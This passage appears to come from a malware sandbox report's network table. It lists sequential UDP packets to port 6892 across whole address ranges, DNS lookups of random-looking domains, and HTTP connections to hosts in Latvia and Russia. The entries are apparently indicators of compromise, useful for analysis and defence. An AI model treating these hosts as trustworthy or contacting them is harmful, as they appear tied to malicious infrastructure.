| LT | 194.165.16.12:6892 | udp | |
| LT | 194.165.16.13:6892 | udp | |
| LT | 194.165.16.14:6892 | udp | |
| LT | 194.165.16.15:6892 | udp | |
| LT | 194.165.16.16:6892 | udp | |
| LT | 194.165.16.17:6892 | udp | |
| LT | 194.165.16.18:6892 | udp | |
| LT | 194.165.16.19:6892 | udp | |
| LT | 194.165.16.20:6892 | udp | |
| LT | 194.165.16.21:6892 | udp | |
| LT | 194.165.16.22:6892 | udp | |
| LT | 194.165.16.23:6892 | udp | |
| LT | 194.165.16.24:6892 | udp | |
| LT | 194.165.16.25:6892 | udp | |
| LT | 194.165.16.26:6892 | udp | |
| LT | 194.165.16.27:6892 | udp | |
| LT | 194.165.16.28:6892 | udp | |
| LT | 194.165.16.29:6892 | udp | |
| LT | 194.165.16.30:6892 | udp | |
| LT | 194.165.16.31:6892 | udp | |
| LT | 194.165.16.32:6892 | udp | |
| LT | 194.165.16.33:6892 | udp | |
| LT | 194.165.16.34:6892 | udp | |
| LT | 194.165.16.35:6892 | udp | |
| LT | 194.165.16.36:6892 | udp | |
| LT | 194.165.16.37:6892 | udp | |
| LT | 194.165.16.38:6892 | udp | |
| LT | 194.165.16.39:6892 | udp | |
| LT | 194.165.16.40:6892 | udp | |
| LT | 194.165.16.41:6892 | udp | |
| LT | 194.165.16.42:6892 | udp | |
| LT | 194.165.16.43:6892 | udp | |
| LT | 194.165.16.44:6892 | udp | |
| LT | 194.165.16.45:6892 | udp | |
| LT | 194.165.16.46:6892 | udp | |
| LT | 194.165.16.47:6892 | udp | |
| LT | 194.165.16.48:6892 | udp | |
| LT | 194.165.16.49:6892 | udp | |
| LT | 194.165.16.50:6892 | udp | |
| LT | 194.165.16.51:6892 | udp | |
| LT | 194.165.16.52:6892 | udp | |
| LT | 194.165.16.53:6892 | udp | |
| LT | 194.165.16.54:6892 | udp | |
| LT | 194.165.16.55:6892 | udp | |
| LT | 194.165.16.56:6892 | udp | |
| LT | 194.165.16.57:6892 | udp | |
| LT | 194.165.16.58:6892 | udp | |
| LT | 194.165.16.59:6892 | udp | |
| LT | 194.165.16.60:6892 | udp | |
| LT | 194.165.16.61:6892 | udp | |
| LT | 194.165.16.62:6892 | udp | |
| LT | 194.165.16.63:6892 | udp | |
| LT | 194.165.16.64:6892 | udp | |
| LT | 194.165.16.65:6892 | udp | |
| LT | 194.165.16.66:6892 | udp | |
| LT | 194.165.16.67:6892 | udp | |
| LT | 194.165.16.68:6892 | udp | |
| LT | 194.165.16.69:6892 | udp | |
| LT | 194.165.16.70:6892 | udp | |
| LT | 194.165.16.71:6892 | udp | |
| LT | 194.165.16.72:6892 | udp | |
| LT | 194.165.16.73:6892 | udp | |
| LT | 194.165.16.74:6892 | udp | |
| LT | 194.165.16.75:6892 | udp | |
| LT | 194.165.16.76:6892 | udp | |
| LT | 194.165.16.77:6892 | udp | |
| LT | 194.165.16.78:6892 | udp | |
| LT | 194.165.16.79:6892 | udp | |
| LT | 194.165.16.80:6892 | udp | |
| LT | 194.165.16.81:6892 | udp | |
| LT | 194.165.16.82:6892 | udp | |
| LT | 194.165.16.83:6892 | udp | |
| LT | 194.165.16.84:6892 | udp | |
| LT | 194.165.16.85:6892 | udp | |
| LT | 194.165.16.86:6892 | udp | |
| LT | 194.165.16.87:6892 | udp | |
| LT | 194.165.16.88:6892 | udp | |
| LT | 194.165.16.89:6892 | udp | |
| LT | 194.165.16.90:6892 | udp | |
| LT | 194.165.16.91:6892 | udp | |
| LT | 194.165.16.92:6892 | udp | |
| LT | 194.165.16.93:6892 | udp | |
| LT | 194.165.16.94:6892 | udp | |
| LT | 194.165.16.95:6892 | udp | |
| LT | 194.165.16.96:6892 | udp | |
| LT | 194.165.16.97:6892 | udp | |
| LT | 194.165.16.98:6892 | udp | |
| LT | 194.165.16.99:6892 | udp | |
| LT | 194.165.16.100:6892 | udp | |
| LT | 194.165.16.101:6892 | udp | |
| LT | 194.165.16.102:6892 | udp | |
| LT | 194.165.16.103:6892 | udp | |
| LT | 194.165.16.104:6892 | udp | |
| LT | 194.165.16.105:6892 | udp | |
| LT | 194.165.16.106:6892 | udp | |
| LT | 194.165.16.107:6892 | udp | |
| LT | 194.165.16.108:6892 | udp | |
| LT | 194.165.16.109:6892 | udp | |
| LT | 194.165.16.110:6892 | udp | |
| LT | 194.165.16.111:6892 | udp | |
| LT | 194.165.16.112:6892 | udp | |
| LT | 194.165.16.113:6892 | udp | |
| LT | 194.165.16.114:6892 | udp | |
| LT | 194.165.16.115:6892 | udp | |
| LT | 194.165.16.116:6892 | udp | |
| LT | 194.165.16.117:6892 | udp | |
| LT | 194.165.16.118:6892 | udp | |
| LT | 194.165.16.119:6892 | udp | |
| LT | 194.165.16.120:6892 | udp | |
| LT | 194.165.16.121:6892 | udp | |
| LT | 194.165.16.122:6892 | udp | |
| LT | 194.165.16.123:6892 | udp | |
| LT | 194.165.16.124:6892 | udp | |
| LT | 194.165.16.125:6892 | udp | |
| LT | 194.165.16.126:6892 | udp | |
| LT | 194.165.16.127:6892 | udp | |
| LT | 194.165.16.128:6892 | udp | |
| LT | 194.165.16.129:6892 | udp | |
| LT | 194.165.16.130:6892 | udp | |
| LT | 194.165.16.131:6892 | udp | |
| LT | 194.165.16.132:6892 | udp | |
| LT | 194.165.16.133:6892 | udp | |
| LT | 194.165.16.134:6892 | udp | |
| LT | 194.165.16.135:6892 | udp | |
| LT | 194.165.16.136:6892 | udp | |
| LT | 194.165.16.137:6892 | udp | |
| LT | 194.165.16.138:6892 | udp | |
| LT | 194.165.16.139:6892 | udp | |
| LT | 194.165.16.140:6892 | udp | |
| LT | 194.165.16.141:6892 | udp | |
| LT | 194.165.16.142:6892 | udp | |
| LT | 194.165.16.143:6892 | udp | |
| LT | 194.165.16.144:6892 | udp | |
| LT | 194.165.16.145:6892 | udp | |
| LT | 194.165.16.146:6892 | udp | |
| LT | 194.165.16.147:6892 | udp | |
| LT | 194.165.16.148:6892 | udp | |
| LT | 194.165.16.149:6892 | udp | |
| LT | 194.165.16.150:6892 | udp | |
| LT | 194.165.16.151:6892 | udp | |
| LT | 194.165.16.152:6892 | udp | |
| LT | 194.165.16.153:6892 | udp | |
| LT | 194.165.16.154:6892 | udp | |
| LT | 194.165.16.155:6892 | udp | |
| LT | 194.165.16.156:6892 | udp | |
| LT | 194.165.16.157:6892 | udp | |
| LT | 194.165.16.158:6892 | udp | |
| LT | 194.165.16.159:6892 | udp | |
| LT | 194.165.16.160:6892 | udp | |
| LT | 194.165.16.161:6892 | udp | |
| LT | 194.165.16.162:6892 | udp | |
| LT | 194.165.16.163:6892 | udp | |
| LT | 194.165.16.164:6892 | udp | |
| LT | 194.165.16.165:6892 | udp | |
| LT | 194.165.16.166:6892 | udp | |
| LT | 194.165.16.167:6892 | udp | |
| LT | 194.165.16.168:6892 | udp | |
| LT | 194.165.16.169:6892 | udp | |
| LT | 194.165.16.170:6892 | udp | |
| LT | 194.165.16.171:6892 | udp | |
| LT | 194.165.16.172:6892 | udp | |
| LT | 194.165.16.173:6892 | udp | |
| LT | 194.165.16.174:6892 | udp | |
| LT | 194.165.16.175:6892 | udp | |
| LT | 194.165.16.176:6892 | udp | |
| LT | 194.165.16.177:6892 | udp | |
| LT | 194.165.16.178:6892 | udp | |
| LT | 194.165.16.179:6892 | udp | |
| LT | 194.165.16.180:6892 | udp | |
| LT | 194.165.16.181:6892 | udp | |
| LT | 194.165.16.182:6892 | udp | |
| LT | 194.165.16.183:6892 | udp | |
| LT | 194.165.16.184:6892 | udp | |
| LT | 194.165.16.185:6892 | udp | |
| LT | 194.165.16.186:6892 | udp | |
| LT | 194.165.16.187:6892 | udp | |
| LT | 194.165.16.188:6892 | udp | |
| LT | 194.165.16.189:6892 | udp | |
| LT | 194.165.16.190:6892 | udp | |
| LT | 194.165.16.191:6892 | udp | |
| LT | 194.165.16.192:6892 | udp | |
| LT | 194.165.16.193:6892 | udp | |
| LT | 194.165.16.194:6892 | udp | |
| LT | 194.165.16.195:6892 | udp | |
| LT | 194.165.16.196:6892 | udp | |
| LT | 194.165.16.197:6892 | udp | |
| LT | 194.165.16.198:6892 | udp | |
| LT | 194.165.16.199:6892 | udp | |
| LT | 194.165.16.200:6892 | udp | |
| LT | 194.165.16.201:6892 | udp | |
| LT | 194.165.16.202:6892 | udp | |
| LT | 194.165.16.203:6892 | udp | |
| LT | 194.165.16.204:6892 | udp | |
| LT | 194.165.16.205:6892 | udp | |
| LT | 194.165.16.206:6892 | udp | |
| LT | 194.165.16.207:6892 | udp | |
| LT | 194.165.16.208:6892 | udp | |
| LT | 194.165.16.209:6892 | udp | |
| LT | 194.165.16.210:6892 | udp | |
| LT | 194.165.16.211:6892 | udp | |
| LT | 194.165.16.212:6892 | udp | |
| LT | 194.165.16.213:6892 | udp | |
| LT | 194.165.16.214:6892 | udp | |
| LT | 194.165.16.215:6892 | udp | |
| LT | 194.165.16.216:6892 | udp | |
| LT | 194.165.16.217:6892 | udp | |
| LT | 194.165.16.218:6892 | udp | |
| LT | 194.165.16.219:6892 | udp | |
| LT | 194.165.16.220:6892 | udp | |
| LT | 194.165.16.221:6892 | udp | |
| LT | 194.165.16.222:6892 | udp | |
| LT | 194.165.16.223:6892 | udp | |
| LT | 194.165.16.224:6892 | udp | |
| LT | 194.165.16.225:6892 | udp | |
| LT | 194.165.16.226:6892 | udp | |
| LT | 194.165.16.227:6892 | udp | |
| LT | 194.165.16.228:6892 | udp | |
| LT | 194.165.16.229:6892 | udp | |
| LT | 194.165.16.230:6892 | udp | |
| LT | 194.165.16.231:6892 | udp | |
| LT | 194.165.16.232:6892 | udp | |
| LT | 194.165.16.233:6892 | udp | |
| LT | 194.165.16.234:6892 | udp | |
| LT | 194.165.16.235:6892 | udp | |
| LT | 194.165.16.236:6892 | udp | |
| LT | 194.165.16.237:6892 | udp | |
| LT | 194.165.16.238:6892 | udp | |
| LT | 194.165.16.239:6892 | udp | |
| LT | 194.165.16.240:6892 | udp | |
| LT | 194.165.16.241:6892 | udp | |
| LT | 194.165.16.242:6892 | udp | |
| LT | 194.165.16.243:6892 | udp | |
| LT | 194.165.16.244:6892 | udp | |
| LT | 194.165.16.245:6892 | udp | |
| LT | 194.165.16.246:6892 | udp | |
| LT | 194.165.16.247:6892 | udp | |
| LT | 194.165.16.248:6892 | udp | |
| LT | 194.165.16.249:6892 | udp | |
| LT | 194.165.16.250:6892 | udp | |
| LT | 194.165.16.251:6892 | udp | |
| LT | 194.165.16.252:6892 | udp | |
| LT | 194.165.16.253:6892 | udp | |
| LT | 194.165.16.254:6892 | udp | |
| US | 8.8.8.8:53 | www.wikitweak.com | udp |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| N/A | 127.0.0.1:49450 | tcp | |
| LT | 194.165.16.255:6892 | udp | |
| LT | 194.165.17.0:6892 | udp | |
| LT | 194.165.17.1:6892 | udp | |
| LT | 194.165.17.2:6892 | udp | |
| LT | 194.165.17.3:6892 | udp | |
| LT | 194.165.17.4:6892 | udp | |
| LT | 194.165.17.5:6892 | udp | |
| LT | 194.165.17.6:6892 | udp | |
| LT | 194.165.17.7:6892 | udp | |
| LT | 194.165.17.8:6892 | udp | |
| LT | 194.165.17.9:6892 | udp | |
| LT | 194.165.17.10:6892 | udp | |
| LT | 194.165.17.11:6892 | udp | |
| LT | 194.165.17.12:6892 | udp | |
| LT | 194.165.17.13:6892 | udp | |
| LT | 194.165.17.14:6892 | udp | |
| LT | 194.165.17.15:6892 | udp | |
| LT | 194.165.17.16:6892 | udp | |
| LT | 194.165.17.17:6892 | udp | |
| LT | 194.165.17.18:6892 | udp | |
| LT | 194.165.17.19:6892 | udp | |
| LT | 194.165.17.20:6892 | udp | |
| LT | 194.165.17.21:6892 | udp | |
| LT | 194.165.17.22:6892 | udp | |
| LT | 194.165.17.23:6892 | udp | |
| LT | 194.165.17.24:6892 | udp | |
| LT | 194.165.17.25:6892 | udp | |
| LT | 194.165.17.26:6892 | udp | |
| LT | 194.165.17.27:6892 | udp | |
| LT | 194.165.17.28:6892 | udp | |
| LT | 194.165.17.29:6892 | udp | |
| LT | 194.165.17.30:6892 | udp | |
| LT | 194.165.17.31:6892 | udp | |
| LT | 194.165.17.32:6892 | udp | |
| LT | 194.165.17.33:6892 | udp | |
| LT | 194.165.17.34:6892 | udp | |
| LT | 194.165.17.35:6892 | udp | |
| LT | 194.165.17.36:6892 | udp | |
| LT | 194.165.17.37:6892 | udp | |
| LT | 194.165.17.38:6892 | udp | |
| LT | 194.165.17.39:6892 | udp | |
| LT | 194.165.17.40:6892 | udp | |
| LT | 194.165.17.41:6892 | udp | |
| LT | 194.165.17.42:6892 | udp | |
| LT | 194.165.17.43:6892 | udp | |
| LT | 194.165.17.44:6892 | udp | |
| LT | 194.165.17.45:6892 | udp | |
| LT | 194.165.17.46:6892 | udp | |
| LT | 194.165.17.47:6892 | udp | |
| LT | 194.165.17.48:6892 | udp | |
| LT | 194.165.17.49:6892 | udp | |
| LT | 194.165.17.50:6892 | udp | |
| LT | 194.165.17.51:6892 | udp | |
| LT | 194.165.17.52:6892 | udp | |
| LT | 194.165.17.53:6892 | udp | |
| LT | 194.165.17.54:6892 | udp | |
| LT | 194.165.17.55:6892 | udp | |
| LT | 194.165.17.56:6892 | udp | |
| LT | 194.165.17.57:6892 | udp | |
| LT | 194.165.17.58:6892 | udp | |
| LT | 194.165.17.59:6892 | udp | |
| LT | 194.165.17.60:6892 | udp | |
| LT | 194.165.17.61:6892 | udp | |
| LT | 194.165.17.62:6892 | udp | |
| LT | 194.165.17.63:6892 | udp | |
| LT | 194.165.17.64:6892 | udp | |
| LT | 194.165.17.65:6892 | udp | |
| LT | 194.165.17.66:6892 | udp | |
| LT | 194.165.17.67:6892 | udp | |
| LT | 194.165.17.68:6892 | udp | |
| LT | 194.165.17.69:6892 | udp | |
| LT | 194.165.17.70:6892 | udp | |
| LT | 194.165.17.71:6892 | udp | |
| LT | 194.165.17.72:6892 | udp | |
| LT | 194.165.17.73:6892 | udp | |
| LT | 194.165.17.74:6892 | udp | |
| LT | 194.165.17.75:6892 | udp | |
| LT | 194.165.17.76:6892 | udp | |
| LT | 194.165.17.77:6892 | udp | |
| LT | 194.165.17.78:6892 | udp | |
| LT | 194.165.17.79:6892 | udp | |
| LT | 194.165.17.80:6892 | udp | |
| LT | 194.165.17.81:6892 | udp | |
| LT | 194.165.17.82:6892 | udp | |
| LT | 194.165.17.83:6892 | udp | |
| LT | 194.165.17.84:6892 | udp | |
| LT | 194.165.17.85:6892 | udp | |
| LT | 194.165.17.86:6892 | udp | |
| LT | 194.165.17.87:6892 | udp | |
| LT | 194.165.17.88:6892 | udp | |
| LT | 194.165.17.89:6892 | udp | |
| LT | 194.165.17.90:6892 | udp | |
| LT | 194.165.17.91:6892 | udp | |
| LT | 194.165.17.92:6892 | udp | |
| LT | 194.165.17.93:6892 | udp | |
| LT | 194.165.17.94:6892 | udp | |
| LT | 194.165.17.95:6892 | udp | |
| LT | 194.165.17.96:6892 | udp | |
| LT | 194.165.17.97:6892 | udp | |
| LT | 194.165.17.98:6892 | udp | |
| LT | 194.165.17.99:6892 | udp | |
| LT | 194.165.17.100:6892 | udp | |
| LT | 194.165.17.101:6892 | udp | |
| LT | 194.165.17.102:6892 | udp | |
| LT | 194.165.17.103:6892 | udp | |
| LT | 194.165.17.104:6892 | udp | |
| LT | 194.165.17.105:6892 | udp | |
| LT | 194.165.17.106:6892 | udp | |
| LT | 194.165.17.107:6892 | udp | |
| LT | 194.165.17.108:6892 | udp | |
| LT | 194.165.17.109:6892 | udp | |
| LT | 194.165.17.110:6892 | udp | |
| LT | 194.165.17.111:6892 | udp | |
| LT | 194.165.17.112:6892 | udp | |
| LT | 194.165.17.113:6892 | udp | |
| LT | 194.165.17.114:6892 | udp | |
| LT | 194.165.17.115:6892 | udp | |
| LT | 194.165.17.116:6892 | udp | |
| LT | 194.165.17.117:6892 | udp | |
| LT | 194.165.17.118:6892 | udp | |
| LT | 194.165.17.119:6892 | udp | |
| LT | 194.165.17.120:6892 | udp | |
| LT | 194.165.17.121:6892 | udp | |
| LT | 194.165.17.122:6892 | udp | |
| LT | 194.165.17.123:6892 | udp | |
| LT | 194.165.17.124:6892 | udp | |
| LT | 194.165.17.125:6892 | udp | |
| LT | 194.165.17.126:6892 | udp | |
| LT | 194.165.17.127:6892 | udp | |
| LT | 194.165.17.128:6892 | udp | |
| LT | 194.165.17.129:6892 | udp | |
| LT | 194.165.17.130:6892 | udp | |
| LT | 194.165.17.131:6892 | udp | |
| LT | 194.165.17.132:6892 | udp | |
| LT | 194.165.17.133:6892 | udp | |
| LT | 194.165.17.134:6892 | udp | |
| LT | 194.165.17.135:6892 | udp | |
| LT | 194.165.17.136:6892 | udp | |
| LT | 194.165.17.137:6892 | udp | |
| LT | 194.165.17.138:6892 | udp | |
| LT | 194.165.17.139:6892 | udp | |
| LT | 194.165.17.140:6892 | udp | |
| LT | 194.165.17.141:6892 | udp | |
| LT | 194.165.17.142:6892 | udp | |
| LT | 194.165.17.143:6892 | udp | |
| LT | 194.165.17.144:6892 | udp | |
| LT | 194.165.17.145:6892 | udp | |
| LT | 194.165.17.146:6892 | udp | |
| LT | 194.165.17.147:6892 | udp | |
| LT | 194.165.17.148:6892 | udp | |
| LT | 194.165.17.149:6892 | udp | |
| LT | 194.165.17.150:6892 | udp | |
| LT | 194.165.17.151:6892 | udp | |
| LT | 194.165.17.152:6892 | udp | |
| LT | 194.165.17.153:6892 | udp | |
| LT | 194.165.17.154:6892 | udp | |
| LT | 194.165.17.155:6892 | udp | |
| LT | 194.165.17.156:6892 | udp | |
| LT | 194.165.17.157:6892 | udp | |
| LT | 194.165.17.158:6892 | udp | |
| LT | 194.165.17.159:6892 | udp | |
| LT | 194.165.17.160:6892 | udp | |
| LT | 194.165.17.161:6892 | udp | |
| LT | 194.165.17.162:6892 | udp | |
| LT | 194.165.17.163:6892 | udp | |
| LT | 194.165.17.164:6892 | udp | |
| LT | 194.165.17.165:6892 | udp | |
| LT | 194.165.17.166:6892 | udp | |
| LT | 194.165.17.167:6892 | udp | |
| LT | 194.165.17.168:6892 | udp | |
| LT | 194.165.17.169:6892 | udp | |
| LT | 194.165.17.170:6892 | udp | |
| LT | 194.165.17.171:6892 | udp | |
| LT | 194.165.17.172:6892 | udp | |
| LT | 194.165.17.173:6892 | udp | |
| LT | 194.165.17.174:6892 | udp | |
| LT | 194.165.17.175:6892 | udp | |
| LT | 194.165.17.176:6892 | udp | |
| LT | 194.165.17.177:6892 | udp | |
| LT | 194.165.17.178:6892 | udp | |
| LT | 194.165.17.179:6892 | udp | |
| LT | 194.165.17.180:6892 | udp | |
| LT | 194.165.17.181:6892 | udp | |
| LT | 194.165.17.182:6892 | udp | |
| LT | 194.165.17.183:6892 | udp | |
| LT | 194.165.17.184:6892 | udp | |
| LT | 194.165.17.185:6892 | udp | |
| LT | 194.165.17.186:6892 | udp | |
| LT | 194.165.17.187:6892 | udp | |
| LT | 194.165.17.188:6892 | udp | |
| LT | 194.165.17.189:6892 | udp | |
| LT | 194.165.17.190:6892 | udp | |
| LT | 194.165.17.191:6892 | udp | |
| LT | 194.165.17.192:6892 | udp | |
| LT | 194.165.17.193:6892 | udp | |
| LT | 194.165.17.194:6892 | udp | |
| LT | 194.165.17.195:6892 | udp | |
| LT | 194.165.17.196:6892 | udp | |
| LT | 194.165.17.197:6892 | udp | |
| LT | 194.165.17.198:6892 | udp | |
| LT | 194.165.17.199:6892 | udp | |
| LT | 194.165.17.200:6892 | udp | |
| LT | 194.165.17.201:6892 | udp | |
| LT | 194.165.17.202:6892 | udp | |
| LT | 194.165.17.203:6892 | udp | |
| LT | 194.165.17.204:6892 | udp | |
| LT | 194.165.17.205:6892 | udp | |
| LT | 194.165.17.206:6892 | udp | |
| LT | 194.165.17.207:6892 | udp | |
| LT | 194.165.17.208:6892 | udp | |
| LT | 194.165.17.209:6892 | udp | |
| LT | 194.165.17.210:6892 | udp | |
| LT | 194.165.17.211:6892 | udp | |
| LT | 194.165.17.212:6892 | udp | |
| LT | 194.165.17.213:6892 | udp | |
| LT | 194.165.17.214:6892 | udp | |
| LT | 194.165.17.215:6892 | udp | |
| LT | 194.165.17.216:6892 | udp | |
| LT | 194.165.17.217:6892 | udp | |
| LT | 194.165.17.218:6892 | udp | |
| LT | 194.165.17.219:6892 | udp | |
| LT | 194.165.17.220:6892 | udp | |
| LT | 194.165.17.221:6892 | udp | |
| LT | 194.165.17.222:6892 | udp | |
| LT | 194.165.17.223:6892 | udp | |
| LT | 194.165.17.224:6892 | udp | |
| LT | 194.165.17.225:6892 | udp | |
| LT | 194.165.17.226:6892 | udp | |
| LT | 194.165.17.227:6892 | udp | |
| LT | 194.165.17.228:6892 | udp | |
| LT | 194.165.17.229:6892 | udp | |
| LT | 194.165.17.230:6892 | udp | |
| LT | 194.165.17.231:6892 | udp | |
| LT | 194.165.17.232:6892 | udp | |
| LT | 194.165.17.233:6892 | udp | |
| LT | 194.165.17.234:6892 | udp | |
| LT | 194.165.17.235:6892 | udp | |
| LT | 194.165.17.236:6892 | udp | |
| LT | 194.165.17.237:6892 | udp | |
| LT | 194.165.17.238:6892 | udp | |
| LT | 194.165.17.239:6892 | udp | |
| LT | 194.165.17.240:6892 | udp | |
| LT | 194.165.17.241:6892 | udp | |
| LT | 194.165.17.242:6892 | udp | |
| LT | 194.165.17.243:6892 | udp | |
| LT | 194.165.17.244:6892 | udp | |
| LT | 194.165.17.245:6892 | udp | |
| LT | 194.165.17.246:6892 | udp | |
| LT | 194.165.17.247:6892 | udp | |
| LT | 194.165.17.248:6892 | udp | |
| LT | 194.165.17.249:6892 | udp | |
| LT | 194.165.17.250:6892 | udp | |
| LT | 194.165.17.251:6892 | udp | |
| LT | 194.165.17.252:6892 | udp | |
| LT | 194.165.17.253:6892 | udp | |
| LT | 194.165.17.254:6892 | udp | |
| LV | 195.123.210.183:80 | tcp | |
| LT | 194.165.17.255:6892 | udp | |
| RU | 91.142.90.61:80 | tcp | |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| US | 8.8.8.8:53 | oubcdqqbrdwpqvxx.click | udp |
| US | 8.8.8.8:53 | bmpelmxmp.info | udp |
| LV | 195.123.210.183:80 | tcp | |
| US | 8.8.8.8:53 | dqeidthjtrwolh.info | udp |
| US | 8.8.8.8:53 | accaqlpser.info | udp |
| US | 15.49.2.0:6892 | udp | |
| US | 15.49.2.1:6892 | udp | |
| US | 15.49.2.2:6892 | udp | |
| US | 15.49.2.3:6892 | udp | |
| US | 15.49.2.4:6892 | udp | |
| US | 15.49.2.5:6892 | udp | |
| US | 15.49.2.6:6892 | udp | |
| US | 15.49.2.7:6892 | udp | |
| US | 15.49.2.8:6892 | udp | |
| US | 15.49.2.9:6892 | udp | |
| US | 15.49.2.10:6892 | udp | |
| US | 15.49.2.11:6892 | udp | |
| US | 15.49.2.12:6892 | udp | |
| US | 15.49.2.13:6892 | udp | |
| US | 15.49.2.14:6892 | udp | |
| US | 15.49.2.15:6892 | udp | |
| US | 15.49.2.16:6892 | udp | |
| US | 15.49.2.17:6892 | udp | |
| US | 15.49.2.18:6892 | udp | |
| US | 15.49.2.19:6892 | udp | |
| US | 15.49.2.20:6892 | udp | |
| US | 15.49.2.21:6892 | udp | |
| US | 15.49.2.22:6892 | udp | |
| US | 15.49.2.23:6892 | udp | |
| US | 15.49.2.24:6892 | udp | |
| US | 15.49.2.25:6892 | udp | |
| US | 15.49.2.26:6892 | udp | |
| US | 15.49.2.27:6892 | udp | |
| US | 15.49.2.28:6892 | udp | |
| US | 15.49.2.29:6892 | udp | |
| US | 15.49.2.30:6892 | udp | |
| US | 15.49.2.31:6892 | udp | |
| JP | 122.1.13.0:6892 | udp | |
| JP | 122.1.13.1:6892 | udp | |
| JP | 122.1.13.2:6892 | udp | |
| JP | 122.1.13.3:6892 | udp | |
| JP | 122.1.13.4:6892 | udp | |
| JP | 122.1.13.5:6892 | udp | |
| JP | 122.1.13.6:6892 | udp | |
| JP | 122.1.13.7:6892 | udp | |
| JP | 122.1.13.8:6892 | udp | |
| JP | 122.1.13.9:6892 | udp | |
| JP | 122.1.13.10:6892 | udp | |
| JP | 122.1.13.11:6892 | udp | |
| JP | 122.1.13.12:6892 | udp | |
| JP | 122.1.13.13:6892 | udp | |
| JP | 122.1.13.14:6892 | udp | |
| JP | 122.1.13.15:6892 | udp | |
| JP | 122.1.13.16:6892 | udp | |
| JP | 122.1.13.17:6892 | udp | |
| JP | 122.1.13.18:6892 | udp | |
| JP | 122.1.13.19:6892 | udp | |
| JP | 122.1.13.20:6892 | udp | |
| JP | 122.1.13.21:6892 | udp | |
| JP | 122.1.13.22:6892 | udp | |
| JP | 122.1.13.23:6892 | udp | |
| JP | 122.1.13.24:6892 | udp | |
| JP | 122.1.13.25:6892 | udp | |
| JP | 122.1.13.26:6892 | udp | |
| JP | 122.1.13.27:6892 | udp | |
| JP | 122.1.13.28:6892 | udp | |
| JP | 122.1.13.29:6892 | udp | |
| JP | 122.1.13.30:6892 | udp | |
| JP | 122.1.13.31:6892 | udp | |
| LT | 194.165.16.0:6892 | udp | |
| LT | 194.165.16.1:6892 | udp | |
| LT | 194.165.16.2:6892 | udp | |
| LT | 194.165.16.3:6892 | udp | |
| LT | 194.165.16.4:6892 | udp | |
| LT | 194.165.16.5:6892 | udp | |
| LT | 194.165.16.6:6892 | udp | |
| LT | 194.165.16.7:6892 | udp | |
| LT | 194.165.16.8:6892 | udp | |
| LT | 194.165.16.9:6892 | udp | |
| LT | 194.165.16.10:6892 | udp | |
| LT | 194.165.16.11:6892 | udp | |
| LT | 194.165.16.12:6892 | udp | |
| LT | 194.165.16.13:6892 | udp | |
| LT | 194.165.16.14:6892 | udp | |
| LT | 194.165.16.15:6892 | udp | |
| LT | 194.165.16.16:6892 | udp | |
| LT | 194.165.16.17:6892 | udp | |
| LT | 194.165.16.18:6892 | udp | |
| LT | 194.165.16.19:6892 | udp | |
| LT | 194.165.16.20:6892 | udp | |
| LT | 194.165.16.21:6892 | udp | |
| LT | 194.165.16.22:6892 | udp | |
| LT | 194.165.16.23:6892 | udp | |
| LT | 194.165.16.24:6892 | udp | |
| LT | 194.165.16.25:6892 | udp | |
| LT | 194.165.16.26:6892 | udp | |
| LT | 194.165.16.27:6892 | udp | |
| LT | 194.165.16.28:6892 | udp | |
| LT | 194.165.16.29:6892 | udp | |
| LT | 194.165.16.30:6892 | udp | |
| LT | 194.165.16.31:6892 | udp | |
| LT | 194.165.16.32:6892 | udp | |
| LT | 194.165.16.33:6892 | udp | |
| LT | 194.165.16.34:6892 | udp | |
| LT | 194.165.16.35:6892 | udp | |
| LT | 194.165.16.36:6892 | udp | |
| LT | 194.165.16.37:6892 | udp | |
| LT | 194.165.16.38:6892 | udp | |
| LT | 194.165.16.39:6892 | udp | |
| LT | 194.165.16.40:6892 | udp | |
| LT | 194.165.16.41:6892 | udp | |
| LT | 194.165.16.42:6892 | udp | |
| LT | 194.165.16.43:6892 | udp | |
| LT | 194.165.16.44:6892 | udp | |
| LT | 194.165.16.45:6892 | udp | |
| LT | 194.165.16.46:6892 | udp | |
| LT | 194.165.16.47:6892 | udp | |
| LT | 194.165.16.48:6892 | udp | |
| LT | 194.165.16.49:6892 | udp | |
| LT | 194.165.16.50:6892 | udp | |
| LT | 194.165.16.51:6892 | udp | |
| LT | 194.165.16.52:6892 | udp | |
| LT | 194.165.16.53:6892 | udp | |
| LT | 194.165.16.54:6892 | udp | |
| LT | 194.165.16.55:6892 | udp | |
| LT | 194.165.16.56:6892 | udp | |
| LT | 194.165.16.57:6892 | udp | |
| LT | 194.165.16.58:6892 | udp | |
| LT | 194.165.16.59:6892 | udp | |
| LT | 194.165.16.60:6892 | udp | |
| LT | 194.165.16.61:6892 | udp | |
| LT | 194.165.16.62:6892 | udp | |
| LT | 194.165.16.63:6892 | udp | |
| LT | 194.165.16.64:6892 | udp | |
| LT | 194.165.16.65:6892 | udp | |
| LT | 194.165.16.66:6892 | udp | |
| LT | 194.165.16.67:6892 | udp | |
| LT | 194.165.16.68:6892 | udp | |
| LT | 194.165.16.69:6892 | udp | |
| LT | 194.165.16.70:6892 | udp | |
| LT | 194.165.16.71:6892 | udp | |
| LT | 194.165.16.72:6892 | udp | |
| LT | 194.165.16.73:6892 | udp | |
| LT | 194.165.16.74:6892 | udp | |
| LT | 194.165.16.75:6892 | udp | |
| LT | 194.165.16.76:6892 | udp | |
| LT | 194.165.16.77:6892 | udp | |
| LT | 194.165.16.78:6892 | udp | |
| LT | 194.165.16.79:6892 | udp | |
| LT | 194.165.16.80:6892 | udp | |
| LT | 194.165.16.81:6892 | udp | |
| LT | 194.165.16.82:6892 | udp | |
| LT | 194.165.16.83:6892 | udp | |
| LT | 194.165.16.84:6892 | udp | |
| LT | 194.165.16.85:6892 | udp | |
| LT | 194.165.16.86:6892 | udp | |
| LT | 194.165.16.87:6892 | udp | |
| LT | 194.165.16.88:6892 | udp | |
| LT | 194.165.16.89:6892 | udp | |
| LT | 194.165.16.90:6892 | udp | |
| LT | 194.165.16.91:6892 | udp | |
| LT | 194.165.16.92:6892 | udp | |
| LT | 194.165.16.93:6892 | udp | |
| LT | 194.165.16.94:6892 | udp | |
| LT | 194.165.16.95:6892 | udp | |
| LT | 194.165.16.96:6892 | udp | |
| LT | 194.165.16.97:6892 | udp | |
| LT | 194.165.16.98:6892 | udp | |
| LT | 194.165.16.99:6892 | udp | |
| LT | 194.165.16.100:6892 | udp | |
| LT | 194.165.16.101:6892 | udp | |
| LT | 194.165.16.102:6892 | udp | |
| LT | 194.165.16.103:6892 | udp | |
| LT | 194.165.16.104:6892 | udp | |
